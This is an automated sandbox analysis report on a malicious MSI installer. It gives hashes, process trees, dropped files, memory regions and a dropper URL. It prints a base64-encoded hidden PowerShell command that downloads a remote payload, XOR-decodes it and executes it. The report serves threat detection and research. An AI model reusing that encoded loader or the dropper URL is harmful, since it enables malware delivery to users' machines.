Overview

overview

10

Static

static

3

RADCUI/RADCUI.dll

windows10-2004-x64

10

RADCUI/pidgenx.dll

windows10-2004-x64

1

RADCUI/termsrv.dll

windows10-2004-x64

1

cdosys/cdosys.dll

windows10-2004-x64

1

iasnap/iasnap.dll

windows10-2004-x64

1

iasnap/mfds.dll

windows10-2004-x64

7

iasnap/mprddm.dll

windows10-2004-x64

1

setup.msi

windows7-x64

6

setup.msi

windows10-2004-x64

10

winmde/MMDevAPI.dll

windows10-2004-x64

1

winmde/Win...cs.dll

windows10-2004-x64

1

winmde/daxexec.dll

windows10-2004-x64

1

winmde/mi.dll

windows10-2004-x64

1

winmde/winmde.dll

windows10-2004-x64

1

Resubmissions

27-04-2024 22:49

240427-2rth2aad39 10

27-04-2024 22:47

240427-2qnamaac87 3

Analysis

  • max time kernel
    95s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-04-2024 22:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup.msi

  • Size

    8.4MB

  • MD5

    7d0e7e9083315bddec9bbc60fbf30ba3

  • SHA1

    008eb06db4a300ae988ea004503382bec53f0743

  • SHA256

    572e7f82c29a2be6f927cb28c1125eb4f7e62f0d5e82e8489706a64e8e8302e2

  • SHA512

    8678ee4b95226e57d4ed867a3cec5827b01389e4542dccab48e11b10b14966117c698c4bd4e02ed752fb8383459a12b1d6cde3a6fdbe9bb87f4005ae72cab0bc

  • SSDEEP

    196608:KN6gYGIfVlhQ+gtODuwjWT6mPY6T/9dFr5Wfbr:KD3IfVlhQ+glwY6ArT6fb

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://opensun.monster/2704e.bs64

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 14 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4456
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4440
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 86C288CCBD72D4456CDB0F4748A23720
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4272
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss2E27.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi2E24.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr2E25.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr2E26.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1232
    • C:\Users\Admin\AppData\Roaming\publub\DuvApp\gpg.exe
      "C:\Users\Admin\AppData\Roaming\publub\DuvApp\gpg.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:724
      • C:\Windows\SysWOW64\explorer.exe
        explorer.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBzAHUAbgAuAG0AbwBuAHMAdABlAHIALwAyADcAMAA0AGUALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
          4⤵
          • Blocklisted process makes network request
          PID:2164

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Config.Msi\e572a5f.rbs
    Filesize

    17KB

    MD5

    fa107e269618b56933e35b1f3f3e04f2

    SHA1

    1f96c08d16ba61aabd454fafcdc2de8507fe4ab9

    SHA256

    f6b06b2e4715e55ab9222ac122a550d0c6bcb7dbbf48866d25730bfddd4a7fb9

    SHA512

    fc6ce248b9061af06b73ab9e989af072e72a374705dcc0135c075b9ad9f17439ef0bd8c4b816ce60020135928b6370f002df8a85bf491925f27d9657effef89e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hvueiyqq.l4w.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\msi2E24.txt
    Filesize

    60B

    MD5

    eb0046beb949b23b97dccd59c4b8f131

    SHA1

    c084a9c15a323cd51d24122681a494e52577487f

    SHA256

    b6594a624b47bcac9a314993f15693e5da2a747adeccff4a996f4ab4491d5467

    SHA512

    8dfdbf11e27242ab14b0997637a9c3deb47d345183c306e0a9b6d62099f4b341dec49f8369bec7ef839e4003d8c7a86267646c9f7c28b8fe9456c3c69b2aeab0

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\pss2E27.ps1
    Filesize

    6KB

    MD5

    30c30ef2cb47e35101d13402b5661179

    SHA1

    25696b2aab86a9233f19017539e2dd83b2f75d4e

    SHA256

    53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f

    SHA512

    882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\scr2E25.ps1
    Filesize

    542B

    MD5

    753240f3d0c58563dcba1244db69b0d7

    SHA1

    4a0f248fccc2431ece50f717cbf80f6681504932

    SHA256

    e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a

    SHA512

    03987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9

    Download Submit

  • C:\Users\Admin\AppData\Roaming\publub\DuvApp\gpg.exe
    Filesize

    1.3MB

    MD5

    35365d3713500bde4e2e1422c54f04fa

    SHA1

    0b24b1de060caa7be51404d82da5fef05958a1da

    SHA256

    5f7e7bb9b2e73abda7e46bfb8b266dbbb7fd3b87ebb253d842ffcfb56f1efe19

    SHA512

    3e276b947220e56da8798245e9e7a16c9899a3842658ef409518968b137474cba7f13955287d1ff2fa7f929dc3ce75a8fd4c1f5fe58e6edb9e89986080aad375

    Download Submit

  • C:\Users\Admin\AppData\Roaming\publub\DuvApp\libassuan-0.dll
    Filesize

    154KB

    MD5

    a2dd12a8ecef27ca0e524e9bb4bdb8f5

    SHA1

    a4f5718c8bc1cc1fba49332d767ad296f7156dbc

    SHA256

    e54d43ae67352ceb170ece1fc1a219de9baf70cb71c1bf85a6c52858e2ca0ada

    SHA512

    b35101d5454db885e4f47333365f3d3ce6ed20b94fb75f6965c6e04116967fb5179abaff92a2c20d47b634e81f5ac53e5e1f3def570dd95ae66a3663c0b1ea2c

    Download Submit

  • C:\Users\Admin\AppData\Roaming\publub\DuvApp\libgcrypt-20.dll
    Filesize

    792KB

    MD5

    ed2da404c1bc70efc1a249f609a9cedd

    SHA1

    8abbf1a5b85d678385764cceb7457988beaf5117

    SHA256

    b4acc6c738ec4a72209ec67f3c1f8fd7e23fe4fe493686d2bc5c59dca26b9ac5

    SHA512

    ad997bd588c7c9867b198a0c4233d842a760176df653b457580bb6b6c9ccb1c751d999aba80de36182d42ea6549335ff6c67b3134655d60bf1e51fce1d93ec6b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\publub\DuvApp\libgpg-error-0.dll
    Filesize

    245KB

    MD5

    72498f59c8c580707a0a3839c332f51b

    SHA1

    fb09b912912610d243066cc8b71435f689e6a449

    SHA256

    51b69b17a15a4c8df35e81b9eef8b3c8eb914e8208f0ebbe9713661583cddf4d

    SHA512

    116956f25484e01236e5aaac2693e78dbc98e47580ac535a49582e21d69602be23f53f45945b0e94b2b0cf2825832a3e1c1f647302bd7b8398794f5579a0e022

    Download Submit

  • C:\Users\Admin\AppData\Roaming\publub\DuvApp\libnpth-0.dll
    Filesize

    40KB

    MD5

    b7b148054a2818699d93f96139b4d0d0

    SHA1

    0a5187b37bd84c19a7d2d84f328fa0adbc75123c

    SHA256

    25fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915

    SHA512

    4f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1

    Download Submit

  • C:\Users\Admin\AppData\Roaming\publub\DuvApp\libsqlite3-0.dll
    Filesize

    1.2MB

    MD5

    0381964390751461a5d79d26ca7cedaa

    SHA1

    3b17b9dca5060f9b22920737165a6bd1de5e8941

    SHA256

    7b307806698bfe2b8a81cf0d04cfd0df4a9916cba30707ce3934b9ee06bd75da

    SHA512

    381e6c2d49016ca2c4435526eb2ac4997f0c43c9bbe3ce56bc0ade3b5cc14677101c1297bbf2a10cec16242124a9246ca5e46003512719dc8360af007fb79b05

    Download Submit

  • C:\Users\Admin\AppData\Roaming\publub\DuvApp\zlib1.dll
    Filesize

    141KB

    MD5

    8f4cdaed2399204619310cd76fd11056

    SHA1

    0f06ef5acde4f1e99a12cfc8489c1163dba910d1

    SHA256

    df14c4dcb9793a1298c3ef531299479c8bea32a9e8124355e6d3ba6b15416213

    SHA512

    3d1e0453f10bece7b65fee3806bce9e36e2c526daa72d66774ed47684a591a978a80894b1643709e76db0adcf6f2dca189aa6413786a9b70c742ceaeec5b80dc

    Download Submit

  • C:\Windows\Installer\MSI2AB9.tmp
    Filesize

    738KB

    MD5

    b158d8d605571ea47a238df5ab43dfaa

    SHA1

    bb91ae1f2f7142b9099e3cc285f4f5b84de568e4

    SHA256

    ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504

    SHA512

    56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

    Download Submit

  • C:\Windows\Installer\MSI2C35.tmp
    Filesize

    758KB

    MD5

    fb4665320c9da54598321c59cc5ed623

    SHA1

    89e87b3cc569edd26b5805244cfacb2f9c892bc7

    SHA256

    9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59

    SHA512

    b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

    Download Submit

  • C:\Windows\Installer\e572a5c.msi
    Filesize

    8.4MB

    MD5

    7d0e7e9083315bddec9bbc60fbf30ba3

    SHA1

    008eb06db4a300ae988ea004503382bec53f0743

    SHA256

    572e7f82c29a2be6f927cb28c1125eb4f7e62f0d5e82e8489706a64e8e8302e2

    SHA512

    8678ee4b95226e57d4ed867a3cec5827b01389e4542dccab48e11b10b14966117c698c4bd4e02ed752fb8383459a12b1d6cde3a6fdbe9bb87f4005ae72cab0bc

    Download Submit

  • memory/724-151-0x0000000000810000-0x0000000000835000-memory.dmp

    Filesize

    148KB

    Download

  • memory/724-154-0x0000000000400000-0x000000000054C000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/724-158-0x000000006A800000-0x000000006A80F000-memory.dmp

    Filesize

    60KB

    Download

  • memory/724-156-0x0000000066580000-0x00000000666AA000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/724-157-0x0000000065A80000-0x0000000065AAA000-memory.dmp

    Filesize

    168KB

    Download

  • memory/724-155-0x000000006B480000-0x000000006B4C1000-memory.dmp

    Filesize

    260KB

    Download

  • memory/724-159-0x0000000063080000-0x00000000630A9000-memory.dmp

    Filesize

    164KB

    Download

  • memory/1232-46-0x0000000007810000-0x0000000007E8A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1232-48-0x0000000007190000-0x0000000007226000-memory.dmp

    Filesize

    600KB

    Download

  • memory/1232-43-0x0000000005EB0000-0x0000000005ECE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1232-42-0x00000000058A0000-0x0000000005BF4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1232-32-0x0000000005830000-0x0000000005896000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1232-31-0x00000000057C0000-0x0000000005826000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1232-30-0x0000000004EF0000-0x0000000004F12000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1232-29-0x0000000005120000-0x0000000005748000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/1232-28-0x00000000028C0000-0x00000000028F6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/1232-49-0x0000000006490000-0x00000000064B2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1232-52-0x0000000008440000-0x0000000008602000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/1232-50-0x0000000007E90000-0x0000000008434000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/1232-47-0x00000000063F0000-0x000000000640A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1232-44-0x0000000005EF0000-0x0000000005F3C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1232-53-0x0000000008B40000-0x000000000906C000-memory.dmp

    Filesize

    5.2MB

    Download

  • memory/3888-153-0x0000000000A50000-0x0000000000A78000-memory.dmp

    Filesize

    160KB

    Download

  • memory/3888-152-0x0000000000A50000-0x0000000000A78000-memory.dmp

    Filesize

    160KB

    Download

  • memory/3888-160-0x0000000000A50000-0x0000000000A78000-memory.dmp

    Filesize

    160KB

    Download

  • memory/3888-162-0x0000000000A50000-0x0000000000A78000-memory.dmp

    Filesize

    160KB

    Download